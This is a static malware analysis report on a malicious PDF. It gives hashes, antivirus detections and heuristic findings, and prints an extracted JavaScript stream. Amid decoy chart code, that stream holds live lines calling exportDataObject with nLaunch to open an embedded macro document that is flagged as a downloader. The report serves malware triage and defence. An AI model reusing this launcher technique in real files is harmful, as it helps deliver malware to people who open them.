Malicious PDF — malware analysis report

Static analysis result for SHA-256 1993afcca49c52bc…

MALICIOUS

PDF

65.5 KB Created: 2017-05-11 23:52:42 +03:00 Authoring application: 3230048 (via iTextSharp’ 5.5.10 ©2000-2016 iText Group NV (AGPL-version)) First seen: 2021-01-15
MD5: 6be6357e4c8926905aa4efd5ab754c4d SHA-1: c6b954b7fd867e2f4a62cc24dbe62dcf0ce79d7b SHA-256: 1993afcca49c52bc927514bd9c6644fd85359ea176c6af7bebf4f13c29cb4e83
216 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9998

Heuristics 7

  • ClamAV: Pdf.Malware.Agent-6312852-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Malware.Agent-6312852-0
  • Malformed active-content stream length medium PDF_MALFORMED_EXPLOIT_STREAM_LENGTH
    A PDF stream that carries active/exploit-looking content has a declared /Length that does not match the recovered stream body. Malformed stream boundaries and length mismatches are common parser-evasion/supporting evidence around Reader exploit streams.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • PDF paints image(s) but contains no text operators info PDF_IMAGE_ONLY_LURE
    PDF has 1 image XObject(s) and the content stream contains no text-emitting operators (BT/ET, Tj, TJ, ', ") in either raw bytes or decompressed streams — this is the screenshot-as-PDF pattern used to bypass text-based scanners and to deliver instructions purely through rendered pixels. It is informational unless paired with invisible links or risky URI context.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
SAQIGU.docm pdf-embedded-file PDF EmbeddedFile object 4 at offset 0x84C 74988 bytes
SHA-256: 5ef6d249672e07149f7bf6efb2878dfd4cafd67290ac263fba7c3fdfba4df464
Detection
ClamAV: Doc.Downloader.Donoff-10030369-0
Obfuscation or payload: likely
actual_type=ZIP; declared_or_context_type=PDF; filename=SAQIGU.docm; kind=pdf-embedded-file
javascript_obj0006_001.js pdf-javascript-stream PDF /JS object 6 at offset 0xFB7E 4564 bytes
SHA-256: 02d20ccb81f8b53897830484b3119fdb4a7fb24e8d41928880904f19bd0ea91e
Preview script
First 1,000 lines of the extracted script
function DashboardLineChartCtrl(baConfig, layoutPaths, baUtil) {    var layoutColors = baConfig.colors;    var graphColor = baConfig.theme.blur ? '#000000' : layoutColors.primary;    var chartData = [      { date: new Date(2012, 11), value: 0, value0: 0 },      { date: new Date(2013, 0), value: 15000, value0: 19000},      { date: new Date(2013, 1), value: 30000, value0: 20000},      { date: new Date(2013, 2), value: 25000, value0: 22000},      { date: new Date(2013, 3), value: 21000, value0: 25000},      { date: new Date(2013, 4), value: 24000, value0: 29000},      { date: new Date(2013, 5), value: 31000, value0: 26000},      { date: new Date(2013, 6), value: 40000, value0: 25000},      { date: new Date(2013, 7), value: 37000, value0: 20000},      { date: new Date(2013, 8), value: 18000, value0: 22000},      { date: new Date(2013, 9), value: 5000, value0: 26000},      { date: new Date(2013, 10), value: 40000, value0: 30000},      { date: new Date(2013, 11), value: 20000, value0: 25000},      { date: new Date(2014, 0), value: 5000, value0: 13000},      { date: new Date(2014, 1), value: 3000, value0: 13000},      { date: new Date(2014, 2), value: 1800, value0: 13000},      { date: new Date(2014, 3), value: 10400, value0: 13000},      { date: new Date(2014, 4), value: 25500, value0: 13000},      { date: new Date(2014, 5), value: 2100, value0: 13000},      { date: new Date(2014, 6), value: 6500, value0: 13000},      { date: new Date(2014, 7), value: 1100, value0: 13000},      { date: new Date(2014, 8), value: 17200, value0: 13000},      { date: new Date(2014, 9), value: 26900, value0: 13000},      { date: new Date(2014, 10), value: 14100, value0: 13000},      { date: new Date(2014, 11), value: 35300, value0: 13000},      { date: new Date(2015, 0), value: 54800, value0: 13000},      { date: new Date(2015, 1), value: 49800, value0: 13000}    ];    var chart = AmCharts.makeChart('amchart', {      type: 'serial',      theme: 'blur',      marginTop: 15,      marginRight: 15,      dataProvider: chartData,      categoryField: 'date',      categoryAxis: {        parseDates: true,        gridAlpha: 0,        color: layoutColors.defaultText,        axisColor: layoutColors.defaultText      },      valueAxes: [        {          minVerticalGap: 50,          gridAlpha: 0,          color: layoutColors.defaultText,          axisColor: layoutColors.defaultText        }      ],      graphs: [        {          id: 'g0',          bullet: 'none',          useLineColorForBulletBorder: true,          lineColor: baUtil.hexToRGB(graphColor, 0.3),          lineThickness: 1,          negativeLineColor: layoutColors.danger,          type: 'smoothedLine',          valueField: 'value0',          fillAlphas: 1,          fillColorsField: 'lineColor'        },        {          id: 'g1',          bullet: 'none',          useLineColorForBulletBorder: true,          lineColor: baUtil.hexToRGB(graphColor, 0.5),          lineThickness: 1,          negativeLineColor: layoutColors.danger,          type: 'smoothedLine',          valueField: 'value',          fillAlphas: 1,          fillColorsField: 'lineColor'        }      ],      chartCursor: {        categoryBalloonDateFormat: 'MM YYYY',        categoryBalloonColor: '#4285F4',        categoryBalloonAlpha: 0.7,        cursorAlpha: 0,        valueLineEnabled: true,        valueLineBalloonEnabled: true,        valueLineAlpha: 0.5      },      dataDateFormat: 'MM YYYY',      export: {        enabled: true      },      creditsPosition: 'bottom-right',      zoomOutButton: {        backgroundColor: '#fff',        backgroundAlpha: 0      },      zoomOutText: '',      pathToImages: layoutPaths.images.amChart    });    function zoomChart() {      chart.zoomToDates(new Date(2013, 3), new Date(2014, 0));    };    chart.addListener('rendered', zoomChart);    zoomChart();    if (chart.zoomChart) {      chart.zoomChart();    }  };var dis = 2;
var abc = this['exportDataObject'];
function submarine() { abc({ cName: "SAQIGU.docm", nLaunch: dis });};var findByUsername = function(username, cb) {  process.nextTick(function() {    for (var i = 0, len = records.length; i < len; i++) {      var record = records[i];      if (record.username === username) {        return cb(null, record);      }    }    return cb(null, null);  });};
var d = [  'json',  'urlencoded', 'bodyParser',  'compress',  'cookieSession',  'session',  'logger', 'cookieParser',  'favicon', 'responseTime',  'errorHandler', 'timeout',  'methodOverride',  'vhost', 'csrf',  'directory',  'limit', 'multipart',  'staticCache',];

Open this report in the interactive analyzer, or submit your own file for analysis.